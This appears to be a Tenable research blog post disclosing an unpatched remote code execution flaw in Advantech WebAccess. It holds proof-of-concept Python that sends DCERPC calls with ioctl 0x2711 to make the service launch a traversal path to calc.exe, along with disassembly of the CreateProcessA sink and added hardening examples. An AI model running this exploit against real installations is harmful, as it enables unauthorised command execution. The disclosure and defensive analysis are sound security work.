Advantech WebAccess Unpatched RCE

Author: Chris Lyne
Sep 10, 2018

Summary

Background

Analysis

[Figure: WebAccess 8.2_20170817]

[Figure: WebAccess 8.3.0]
Opcode  Address     Function Name
---------------------------------
0x00 0x00401000 sub_401000
0x01 0x00401260 sub_401260
0x02 0x00401420 sub_401420
0x03 0x00401630 sub_401630
0x04 0x004017A0 sub_4017A0
0x05 0x00401970 sub_401970
0x06 0x00401A80 sub_401A80
0x07 0x00401BA0 sub_401BA0
print("...2")
# Opnum 4: the stub is a single DWORD (0x02). The reply carries three DWORDs;
# the third one is reused below as the first argument of the opnum 1 call.
# call() is the script's own helper (not shown on this page): it sends the opnum
# and stub over the DCERPC binding `dce` and returns the raw reply, or -1 on failure.
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
    print("Something went wrong")
    sys.exit(1)
if len(res) < 12:                       # three little-endian DWORDs expected
    print("Received unexpected length value")
    sys.exit(1)
res = struct.unpack("<III", res[:12])

print("...3")
# Opnum 1 with ioctl 0x2711: arg_2 = value from the opnum 4 reply, arg_3 = ioctl,
# arg_4 = buffer size (0x204), then the NDR conformant-array count for the
# 0x204-byte command string that follows.
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = b"..\\..\\windows\\system32\\calc.exe"   # relative path; the service resolves it
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)                # NUL-padded to 0x204 bytes
call(dce, 1, stubdata)
[Figure: Decompilation with mIDA]
/* opcode: 0x01, address: 0x00401260 */
void sub_401260 (
    [in] handle_t arg_1,
    [in] long arg_2,
    [in] long arg_3,
    [in] long arg_4,
    [in][ref][size_is(arg_4)] char * arg_5,
    [out][ref] long * arg_6
);
# The same five lines, mapped onto the sub_401260 prototype recovered with mIDA:
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)  # arg_2, arg_3 (ioctl), arg_4 (size_is), conformant count for arg_5
command = b"..\\..\\windows\\system32\\calc.exe"                 # contents of arg_5
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)                             # arg_5: 0x204 bytes, NUL-padded
call(dce, 1, stubdata)                                            # opcode 0x01 -> sub_401260
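As an added example (not part of the original post and not Tenable's PoC), the following packs the opnum 1 stub exactly as the fragment above does and parses it back the way a server implementing the sub_401260 prototype would see it. The reading of the fourth DWORD as the NDR conformant-array count that precedes arg_5, and the constructed opnum 4 reply, are assumptions made for the example.

```python
import struct

# Values taken from the PoC fragment and the mIDA prototype above.
OPNUM_DISPATCH = 1            # opcode 0x01 -> sub_401260
IOCTL_RUN_COMMAND = 0x2711    # ioctl the PoC sends (10001 decimal)
CMD_BUF_LEN = 0x204           # fixed length of the command buffer (arg_4)
HEADER_FMT = "<IIII"          # arg_2, arg_3, arg_4, conformant count for arg_5 (assumption)
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 16 bytes


def parse_open_reply(res):
    """Parse the reply to the opnum 4 call.

    The PoC reads three little-endian DWORDs and reuses the third as arg_2 of
    the opnum 1 call. Checking the raw length first turns a short reply into a
    clear error instead of a struct exception.
    """
    if res == -1 or len(res) < 12:
        raise ValueError("opnum 4 reply too short: %r" % (res,))
    return struct.unpack_from("<III", res, 0)


def pack_stub(arg_2, ioctl, command, buf_len=CMD_BUF_LEN):
    """Marshal the [in] arguments of sub_401260 the way the PoC does.

    Wire layout (NDR, little endian):
      long arg_2           value returned by opnum 4
      long arg_3           ioctl number
      long arg_4           size_is() of arg_5
      long max_count       conformant-array count that precedes arg_5
                           (assumed reason the PoC packs four DWORDs)
      char arg_5[buf_len]  NUL-padded command string
    """
    if isinstance(command, str):
        command = command.encode("latin-1")
    if len(command) >= buf_len:
        raise ValueError("command must leave room for a NUL terminator")
    header = struct.pack(HEADER_FMT, arg_2, ioctl, buf_len, buf_len)
    body = struct.pack("<%ds" % buf_len, command)   # pads with NUL bytes
    return header + body


def unpack_stub(stub):
    """Server-side view of the same stub.

    Returns the fields as a dict. Rejects a stub whose conformant count
    disagrees with arg_4 or whose buffer is shorter than arg_4 claims, which is
    the least a handler should check before touching arg_5.
    """
    if len(stub) < HEADER_LEN:
        raise ValueError("stub shorter than its fixed header")
    arg_2, arg_3, arg_4, max_count = struct.unpack_from(HEADER_FMT, stub, 0)
    if max_count != arg_4:
        raise ValueError("conformant count %#x != size_is %#x" % (max_count, arg_4))
    body = stub[HEADER_LEN:HEADER_LEN + arg_4]
    if len(body) != arg_4:
        raise ValueError("buffer truncated: %d of %d bytes" % (len(body), arg_4))
    command = body.split(b"\x00", 1)[0].decode("latin-1")
    return {"arg_2": arg_2, "ioctl": arg_3, "size": arg_4, "command": command}


def stub_is_rejected(stub):
    """True if unpack_stub refuses the stub (exercises the validation path)."""
    try:
        unpack_stub(stub)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed reply: pretend opnum 4 answered with three DWORDs.
    fake_reply = struct.pack("<III", 0, 1, 0x1234)
    handle = parse_open_reply(fake_reply)[2]
    stub = pack_stub(handle, IOCTL_RUN_COMMAND, "..\\..\\windows\\system32\\calc.exe")
    print(len(stub), unpack_stub(stub))
```

The structural checks in unpack_stub only establish that the stub is well formed; they say nothing about what the 0x204-byte string contains, which is what ends up at the CreateProcessA call further down.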
[Figure: IOCTL Used in Calculation]

[Figure: 10,000 Foot View]

[Figure: 118 Possible Cases]
.text:002517B0 ; int __cdecl sub_2517B0(LPSTR lpCommandLine, __int16)
.text:002517B0 sub_2517B0 proc near ; CODE XREF: .text:drawsrv_DsDaqWebService+86p
.text:002517B0
.text:002517B0 ProcessInformation= _PROCESS_INFORMATION ptr -54h
.text:002517B0 StartupInfo= _STARTUPINFOA ptr -44h
.text:002517B0 lpCommandLine= dword ptr 4
.text:002517B0 arg_4= word ptr 8
.text:002517B0
.text:002517B0 sub esp, 54h
.text:002517B3 push edi
.text:002517B4 xor eax, eax
.text:002517B6 mov ecx, 10h
.text:002517BB lea edi, [esp+58h+StartupInfo.lpReserved]
.text:002517BF rep stosd
.text:002517C1 lea eax, [esp+58h+StartupInfo]
.text:002517C5 push eax ; lpStartupInfo
.text:002517C6 mov [esp+5Ch+StartupInfo.cb], 44h
.text:002517CE call ds:GetStartupInfoA
.text:002517D4 mov cx, [esp+58h+arg_4]
.text:002517D9 lea edx, [esp+58h+ProcessInformation]
.text:002517DD push edx ; lpProcessInformation
.text:002517DE lea eax, [esp+5Ch+StartupInfo]
.text:002517E2 push eax ; lpStartupInfo
.text:002517E3 push 0 ; lpCurrentDirectory
.text:002517E5 push 0 ; lpEnvironment
.text:002517E7 push 0 ; dwCreationFlags
.text:002517E9 push 0 ; bInheritHandles
.text:002517EB push 0 ; lpThreadAttributes
.text:002517ED mov [esp+74h+StartupInfo.wShowWindow], cx
.text:002517F2 mov ecx, [esp+74h+lpCommandLine]
.text:002517F6 push 0 ; lpProcessAttributes
.text:002517F8 push ecx ; lpCommandLine
.text:002517F9 push 0 ; lpApplicationName
.text:002517FB call ds:CreateProcessA
[snip]
...
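The listing above passes the client-supplied buffer to CreateProcessA as lpCommandLine with lpApplicationName and lpCurrentDirectory both NULL, so the client chooses the program and a relative path is resolved against the service's current directory. As an added example (mine, not the vendor's patch and not code from the post), the following models that sink, shows where the PoC's `..\..` path lands under an assumed working directory, and puts an allowlist-based handler beside it. SERVICE_DIR and ALLOWED_PROGRAMS are placeholders; the page does not state either.

```python
import ntpath

# Assumptions for this example only: the service's working directory and an
# allowlist of programs the handler is meant to launch. Neither is on the page.
SERVICE_DIR = r"C:\WebAccess\Node"          # hypothetical
ALLOWED_PROGRAMS = {"example_tool.exe"}     # constructed placeholder name


def vulnerable_command_line(arg_5):
    """Model of sub_2517B0: the NUL-terminated string in arg_5 becomes
    lpCommandLine, with lpApplicationName = NULL, so the client picks the program."""
    return arg_5.split("\x00", 1)[0]


def program_token(command_line):
    """What CreateProcess treats as the program when lpApplicationName is NULL:
    a double-quoted first token, otherwise the text up to the first space.
    (For unquoted paths with spaces the API tries longer prefixes in turn;
    this returns the first candidate.)"""
    cl = command_line.lstrip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[1:] if end == -1 else cl[1:end]
    return cl.split(" ", 1)[0]


def resolve_as_server_would(arg_5, base_dir=SERVICE_DIR):
    """Where a relative program token lands when resolved against the
    service's current directory (assumed here to be base_dir)."""
    token = program_token(vulnerable_command_line(arg_5))
    return ntpath.normpath(ntpath.join(base_dir, token))


def hardened_command_line(arg_5, base_dir=SERVICE_DIR, allowed=ALLOWED_PROGRAMS):
    """Hardened replacement: accept only a bare file name on the allowlist,
    build an absolute path under base_dir, quote it, and re-check containment."""
    name = arg_5.split("\x00", 1)[0]
    if (not name or name in (".", "..")
            or ntpath.splitdrive(name)[0]          # drive letter or UNC prefix
            or name != ntpath.basename(name)):     # any \ or / component
        raise ValueError("program must be a bare file name: %r" % name)
    if name.lower() not in allowed:
        raise ValueError("program not on the allowlist: %r" % name)
    full = ntpath.normpath(ntpath.join(base_dir, name))
    if ntpath.commonpath([full, base_dir]) != ntpath.normpath(base_dir):
        raise ValueError("resolved outside %s: %s" % (base_dir, full))
    return '"%s"' % full            # quoted, so a space in the path cannot split it


def is_rejected(arg_5):
    """True if hardened_command_line refuses arg_5."""
    try:
        hardened_command_line(arg_5)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "..\\..\\windows\\system32\\calc.exe"
    print("vulnerable:", resolve_as_server_would(payload))
    print("hardened:", hardened_command_line("example_tool.exe"))
    print("hardened rejects payload:", is_rejected(payload))
```

The quoting matters independently of the allowlist: an unquoted lpCommandLine whose path contains spaces is resolved prefix by prefix by CreateProcess, so a writable directory along the way is another route to running something else.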
[Figure: BinDiff of Function 1]

[Figure: BinDiff of Function 2]

[Figure: BinDiff of Function 3]

[Figure: BinDiff of Function 4]

[Figure: BinDiff of Function 5]

Conclusion

[Figure: Summary of Events]

Tenable TechBlog

Learn how Tenable finds new vulnerabilities and writes the software to help you find them

Written by Chris Lyne

Chris is a security researcher at Tenable, focused on finding 0-day vulnerabilities. He is a former developer and aims to make the cyber world more secure.